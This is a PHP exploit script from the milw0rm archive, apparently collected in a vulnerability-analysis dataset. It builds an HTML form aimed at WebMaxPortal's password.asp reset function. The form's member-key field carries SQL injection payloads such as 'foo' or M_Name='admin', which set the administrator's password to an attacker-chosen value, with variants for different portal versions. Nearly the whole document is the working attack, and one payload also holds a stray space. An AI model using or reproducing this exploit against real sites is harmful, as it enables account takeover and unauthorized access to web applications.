lilbool/vuln-code-analysis
0
1<?php
2/*
3------Trap-Set Underground Hacking Team-----------------mh_p0rtal----------------------
4Greetz to : Alpha_programmer , Oil_karchack , Str0ke And Iranian Hacking & Security Teams :
5Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
6, CrouZ Security Team , Simorgh-ev Security Team
7----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
8*/
9# Config ________________________________
10# address - example: http://www.site.com/password.asp
11$url = "http://www.mohamad.com/password.asp";
12$mh = "s1";
13# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"
14# if webmaxportal version is : Version 1.36 , 2.0 please input $mh= "s2"
15# EnD ___________________________________
16if ( $mh == "s1" ) {
17print "<form action=\"$url?mode=reset\" method=\"post\"> <br> ";
18print "Password1 : <input name=\"pass\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
19print "Confirm Pass: <input name=\"pass2\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
20print " ID :    <input name=\"memId\" type=\"text\" value=\"-1\" size=\"50\"><br>";
21print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo' or M_Name='admin\" size=\"50\"><br>";
22print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
23print "</form>";
24} if ( $mh == "s2" ) {
25print "<form action=\"$url?mode=reset\" method=\"post\"> <br> ";
26print "Password1: <input name=\"pass\" type=\"text\" value=\"abc123\" size=\"50\"><br>";
27print "Confirm Pass : <input name=\"pass2\" type=\"text\" value=\"abc123\" size=\"50\"><br> ";
28print "ID :    <input name=\"memId\" type=\"text\" value=\"-1\" size=\"50\"><br> ";
29print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name='admi n' or ('1'='2\" size=\"50\"> <br>";
30print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
31print "</form>";
32}
33?>
34
35# milw0rm.com [2005-05-26]